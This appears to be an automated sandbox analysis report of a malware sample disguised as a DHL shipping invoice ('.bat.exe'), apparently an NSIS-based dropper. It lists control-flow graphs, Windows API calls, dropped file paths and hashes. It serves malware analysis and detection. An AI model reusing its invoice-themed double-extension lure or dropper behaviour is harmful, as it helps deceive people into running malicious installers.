                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                      • API String ID: 1975747703-3410746228
                                                                                                                                                                                                                                      • Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                                                                      • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 213 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 216 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 213->216 217 402f2d-402f32 213->217 225 403052-403060 call 402e79 216->225 226 402f6b 216->226 218 40310f-403113 217->218 232 403062-403065 225->232 233 4030b5-4030ba 225->233 228 402f70-402f87 226->228 230 402f89 228->230 231 402f8b-402f94 call 403331 228->231 230->231 238 402f9a-402fa1 231->238 239 4030bc-4030c4 call 402e79 231->239 235 403067-40307f call 403347 call 403331 232->235 236 403089-4030b3 GlobalAlloc call 403347 call 403116 232->236 233->218 235->233 260 403081-403087 235->260 236->233 264 4030c6-4030d7 236->264 242 402fa3-402fb7 call 405d6b 238->242 243 40301d-403021 238->243 239->233 251 40302b-403031 242->251 262 402fb9-402fc0 242->262 250 403023-40302a call 402e79 243->250 243->251 250->251 253 403040-40304a 251->253 254 403033-40303d call 406787 251->254 253->228 263 403050 253->263 254->253 260->233 260->236 262->251 266 402fc2-402fc9 262->266 263->225 267 4030d9 264->267 268 4030df-4030e4 264->268 266->251 269 402fcb-402fd2 266->269 267->268 270 4030e5-4030eb 268->270 269->251 271 402fd4-402fdb 269->271 270->270 272 4030ed-403108 SetFilePointer call 405d6b 270->272 271->251 273 402fdd-402ffd 271->273 275 40310d 272->275 273->233 276 403003-403007 273->276 275->218 277 403009-40300d 276->277 278 40300f-403017 276->278 277->263 277->278 278->251 279 403019-40301b 278->279 279->251
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                                                                                                                                                      • C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                                                                                                                                                                                                                      • soft, xrefs: 00402FCB
                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                                                                                                                                                      • Null, xrefs: 00402FD4
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", xrefs: 00402EDD
                                                                                                                                                                                                                                      • Inst, xrefs: 00402FC2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                      • API String ID: 4283519449-1921946147
                                                                                                                                                                                                                                      • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                                      • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 280 4062dc-4062e7 281 4062e9-4062f8 280->281 282 4062fa-406310 280->282 281->282 283 406316-406323 282->283 284 406528-40652e 282->284 283->284 285 406329-406330 283->285 286 406534-40653f 284->286 287 406335-406342 284->287 285->284 289 406541-406545 call 4062ba 286->289 290 40654a-40654b 286->290 287->286 288 406348-406354 287->288 291 406515 288->291 292 40635a-406398 288->292 289->290 296 406523-406526 291->296 297 406517-406521 291->297 294 4064b8-4064bc 292->294 295 40639e-4063a9 292->295 300 4064be-4064c4 294->300 301 4064ef-4064f3 294->301 298 4063c2 295->298 299 4063ab-4063b0 295->299 296->284 297->284 307 4063c9-4063d0 298->307 299->298 304 4063b2-4063b5 299->304 305 4064d4-4064e0 call 4062ba 300->305 306 4064c6-4064d2 call 406201 300->306 302 406502-406513 lstrlenW 301->302 303 4064f5-4064fd call 4062dc 301->303 302->284 303->302 304->298 310 4063b7-4063ba 304->310 316 4064e5-4064eb 305->316 306->316 312 4063d2-4063d4 307->312 313 4063d5-4063d7 307->313 310->298 317 4063bc-4063c0 310->317 312->313 314 406412-406415 313->314 315 4063d9-406400 call 406188 313->315 321 406425-406428 314->321 322 406417-406423 GetSystemDirectoryW 314->322 328 4064a0-4064a3 315->328 329 406406-40640d call 4062dc 315->329 316->302 320 4064ed 316->320 317->307 324 4064b0-4064b6 call 40654e 320->324 326 406493-406495 321->326 327 40642a-406438 GetWindowsDirectoryW 321->327 325 406497-40649b 322->325 324->302 325->324 331 40649d 325->331 326->325 330 40643a-406444 326->330 327->326 328->324 334 4064a5-4064ab lstrcatW 328->334 329->325 336 406446-406449 330->336 337 40645e-406474 SHGetSpecialFolderLocation 330->337 331->328 334->324 336->337 341 40644b-406452 336->341 338 406476-40648d SHGetPathFromIDListW CoTaskMemFree 337->338 339 40648f 337->339 338->325 338->339 339->326 342 40645a-40645c 341->342 342->325 342->337
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405359,0041DA00,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(0041DA00,Call), ref: 0040647A
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(0041DA00), ref: 00406485
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 717251189-3319343437
                                                                                                                                                                                                                                      • Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                                                                      • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 407 40176f-401794 call 402c41 call 405c06 412 401796-40179c call 4062ba 407->412 413 40179e-4017b0 call 4062ba call 405b8f lstrcatW 407->413 418 4017b5-4017b6 call 40654e 412->418 413->418 422 4017bb-4017bf 418->422 423 4017c1-4017cb call 4065fd 422->423 424 4017f2-4017f5 422->424 431 4017dd-4017ef 423->431 432 4017cd-4017db CompareFileTime 423->432 426 4017f7-4017f8 call 405d8b 424->426 427 4017fd-401819 call 405db0 424->427 426->427 434 40181b-40181e 427->434 435 40188d-4018b6 call 405322 call 403116 427->435 431->424 432->431 437 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 434->437 438 40186f-401879 call 405322 434->438 449 4018b8-4018bc 435->449 450 4018be-4018ca SetFileTime 435->450 437->422 470 401864-401865 437->470 447 401882-401888 438->447 451 402ace 447->451 449->450 453 4018d0-4018db CloseHandle 449->453 450->453 454 402ad0-402ad4 451->454 456 4018e1-4018e4 453->456 457 402ac5-402ac8 453->457 459 4018e6-4018f7 call 4062dc lstrcatW 456->459 460 4018f9-4018fc call 4062dc 456->460 457->451 466 401901-4022fc call 405920 459->466 460->466 466->454 470->447 472 401867-401868 470->472 472->438
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes,?,?,00000031), ref: 004017B0
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                        • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041DA00,757C23A0), ref: 0040537D
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes$C:\Users\user\AppData\Local\Temp\nsn7D60.tmp$C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dll$Call
                                                                                                                                                                                                                                      • API String ID: 1941528284-440801192
                                                                                                                                                                                                                                      • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                                                                                                      • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 473 403116-40312d 474 403136-40313f 473->474 475 40312f 473->475 476 403141 474->476 477 403148-40314d 474->477 475->474 476->477 478 40315d-40316a call 403331 477->478 479 40314f-403158 call 403347 477->479 483 403170-403174 478->483 484 40331f 478->484 479->478 485 4032ca-4032cc 483->485 486 40317a-4031c3 GetTickCount 483->486 487 403321-403322 484->487 488 40330c-40330f 485->488 489 4032ce-4032d1 485->489 490 403327 486->490 491 4031c9-4031d1 486->491 492 40332a-40332e 487->492 496 403311 488->496 497 403314-40331d call 403331 488->497 489->490 493 4032d3 489->493 490->492 494 4031d3 491->494 495 4031d6-4031e4 call 403331 491->495 498 4032d6-4032dc 493->498 494->495 495->484 507 4031ea-4031f3 495->507 496->497 497->484 505 403324 497->505 502 4032e0-4032ee call 403331 498->502 503 4032de 498->503 502->484 510 4032f0-4032fc call 405e62 502->510 503->502 505->490 509 4031f9-403219 call 4067f5 507->509 515 4032c2-4032c4 509->515 516 40321f-403232 GetTickCount 509->516 517 4032c6-4032c8 510->517 518 4032fe-403308 510->518 515->487 519 403234-40323c 516->519 520 40327d-40327f 516->520 517->487 518->498 523 40330a 518->523 524 403244-40327a MulDiv wsprintfW call 405322 519->524 525 40323e-403242 519->525 521 403281-403285 520->521 522 4032b6-4032ba 520->522 527 403287-40328e call 405e62 521->527 528 40329c-4032a7 521->528 522->491 529 4032c0 522->529 523->490 524->520 525->520 525->524 533 403293-403295 527->533 532 4032aa-4032ae 528->532 529->490 532->509 534 4032b4 532->534 533->517 535 403297-40329a 533->535 534->490 535->532
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                      • String ID: ... %d%%$@
                                                                                                                                                                                                                                      • API String ID: 551687249-3859443358
                                                                                                                                                                                                                                      • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                                                                                                      • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 536 40264a-402663 call 402c1f 539 402ac5-402ac8 536->539 540 402669-402670 536->540 543 402ace-402ad4 539->543 541 402672 540->541 542 402675-402678 540->542 541->542 545 4027dc-4027e4 542->545 546 40267e-40268d call 40621a 542->546 545->539 546->545 549 402693 546->549 550 402699-40269d 549->550 551 402732-402735 550->551 552 4026a3-4026be ReadFile 550->552 553 402737-40273a 551->553 554 40274d-40275d call 405e33 551->554 552->545 555 4026c4-4026c9 552->555 553->554 556 40273c-402747 call 405e91 553->556 554->545 564 40275f 554->564 555->545 558 4026cf-4026dd 555->558 556->545 556->554 561 4026e3-4026f5 MultiByteToWideChar 558->561 562 402798-4027a4 call 406201 558->562 563 4026f7-4026fa 561->563 561->564 562->543 567 4026fc-402707 563->567 569 402762-402765 564->569 567->569 570 402709-40272e SetFilePointer MultiByteToWideChar 567->570 569->562 571 402767-40276c 569->571 570->567 572 402730 570->572 573 4027a9-4027ad 571->573 574 40276e-402773 571->574 572->564 576 4027ca-4027d6 SetFilePointer 573->576 577 4027af-4027b3 573->577 574->573 575 402775-402788 574->575 575->545 578 40278a-402790 575->578 576->545 579 4027b5-4027b9 577->579 580 4027bb-4027c8 577->580 578->550 581 402796 578->581 579->576 579->580 580->545 581->545
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                                        • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                      • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                                                                      • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18

